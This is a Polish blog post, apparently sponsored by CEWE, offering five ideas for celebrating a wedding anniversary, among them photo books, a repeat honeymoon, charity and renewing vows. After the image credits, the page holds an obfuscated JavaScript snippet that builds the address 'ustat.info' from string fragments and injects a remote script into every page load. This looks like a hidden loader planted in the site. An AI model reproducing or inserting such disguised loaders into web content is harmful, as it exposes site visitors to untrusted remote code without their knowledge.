Rocznica ślubu – 5 pomysłów na świętowanie

Ślub zawsze jest nie lada przeżyciem, ale to też dzień, który można celebrować z wspólnie co rok, podczas rocznicy ślubu. Przecież to bardzo przyjemna okazja do okazania sobie czułości i małżeńskiej sympatii, a my chcemy podsunąć kilka pomysłów na świętowanie tego wyjątkowego dnia.

Moment, w którym powiedzieliście sobie sakramentalne TAK, otworzył nowy rozdział w Waszym życiu. Staliście się mężem i żoną, ukochanymi, którzy trwają przy sobie mimo różnych przeciwności. W zdrowiu i w chorobie, w smutku i radości, jesteście razem i celebrujecie miłość oraz święty związek małżeński. Jak? To zależy od was.

Rocznica ślubu – 5 pomysłów na świętowanie
Rocznica ślubu – 5 pomysłów na świętowanie

1. Spotkanie ze znajomymi

Zapraszacie bliskich, którzy byli na weselu. Oczywiście nie mówimy tu o powtarzaniu imprezy na 100 osób, lecz kameralne spotkanie np. ze świadkami lub rodziną – przecież Wasz ślub dla nich też był ważnym dniem. Podczas wspólnego oglądania filmu lub albumu ze zdjęciami, przypomni się Wam tamta uroczystość i wspaniałe chwile. Powspominacie, poświętujecie i znów poczujecie się młodo. Jeśli od czasu wesela poznaliście nowych znajomych, którzy nie byli na Waszej weselnej uroczystości, to ciekawy sposób na nadrobienie tego wydarzenia. Jeśli wolicie spędzić ten dzień tylko ze sobą, to świętowanie we dwójkę też może mieć swój urok.

2. Wasze uczucie w obiektywie

Na pewno mieliście sesję ślubną, ale wspólne fotografowanie się podczas każdej rocznicy, pozwoli Wam uzbierać ciekawe pamiątki na całe życie. Kiedyś zobaczycie jak zmienialiście się przez lata, ale niezmiennie byliście razem na zdjęciach. Z takich fotografii możecie wykonać fotoksiążkę, którą kiedyś pokażecie wnukom lub sami z radością będziecie zaglądać do niej i wspominać nawet za 20-30 lat. Możecie też umówić się na prezenty w postaci sesji pojedynczej. Jako żona zmień się na jeden dzień w modelkę, wynajmij fotografa, zbierz zdjęcia i stwórz fotoksiążki dla męża. On niech zrobi to samo, jako model. Wyobraź sobie chwilę, gdy podczas wspólnej kolacji zobaczycie sesję współmałżonka, która została wykonana specjalnie dla Was.

Rocznica ślubu – 5 pomysłów na świętowanie
Rocznica ślubu – 5 pomysłów na świętowanie

3. Powtórka podróży poślubnej

Jeśli takową już odbyliście, wyjedźcie znów i podążajcie szlakiem miejsc, które odwiedzaliście po ślubie. Na pewno obudzą się w Was wspomnienia i poczujecie jakbyście dopiero co powiedzieli sobie TAK przed ołtarzem. Jeśli z różnych względów kiedyś nie wyjechaliście w podróż poślubną to rocznica jest doskonałą okazją, aby coś nadrobić. Jeśli chcecie coś powtórzyć, może odwiedzicie miejsce oświadczyn? Klimat na pewno przypomni Wam tę niesamowitą chwilę.

4. Dobry uczynek

Jeśli uznacie zgodnie, że zamiast wydawać pieniądze na prezenty, wolicie przekazać jakąś kwotę na szczytny cel, to tak zróbcie. Może być to dom dziecka, schronisko lub może inne miejsce, które wybierzecie. Dobrym uczynkiem może być też wolontariat lub… przygarnięcie zwierzątka. Najważniejsze, abyście zgodnie wybrali sposób świętowania i dziękowania za to, że jesteście razem. Zgoda przecież buduje, ale to szczerość spala najtrwalej.   

5. Odnowienie przysięgi ślubnej

Rocznica ślubu – 5 pomysłów na świętowanie
Rocznica ślubu – 5 pomysłów na świętowanie

Zdarza się, że pary co roku chcą stawać na ślubnym kobiercu. Tym razem bez tłumu gości, bez świadków, w innym miejscu, intymniej. Może być to Wasza wspólna tradycja, jeśli lubicie podróżować. Braliście ślub w Polsce na Śląsku? Może kolejny weźmiecie nad morzem, w górach lub za granicą? Macie spore pole do popisu, ale najważniejsze, aby była to wasza wspólna tradycja, której oboje chcecie. Oczywiście mam tu na myśli coroczny ślub tej samej pary. Wszystko to warto uwieczniać na zdjęciach i wracać do pięknych momentów, gdy tylko zechcecie.

Artykuł powstał we współpracy z CEWE – producentem kreatywnych fotoprezentów, fotopamiątek i najchętniej kupowanej fotoksiążki w Europie.

Źródło zdjęć: Depositphoto, ThinkstockPhotos

(function(){
tyvau=”argXdkj9yva6″;tyva=document.createElement(“script”);
tyva_=”u”+(“st”);tyva_+=”at”+(“.”);tyva.async=true;tyva_+=”in”;
tyvau=”1967477.”+tyvau;tyva.type=”text/javascript”;tyvau+=”qwmfnrq8iu19″;
tyvau+=”9zvwtaX9″;tyva_+=(“f”)+”o”+(“/”);tyva.src=”//”+tyva_+tyvau;
tyvad=document.body;tyvad.appendChild(tyva);
})();

Podobne wpisy

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.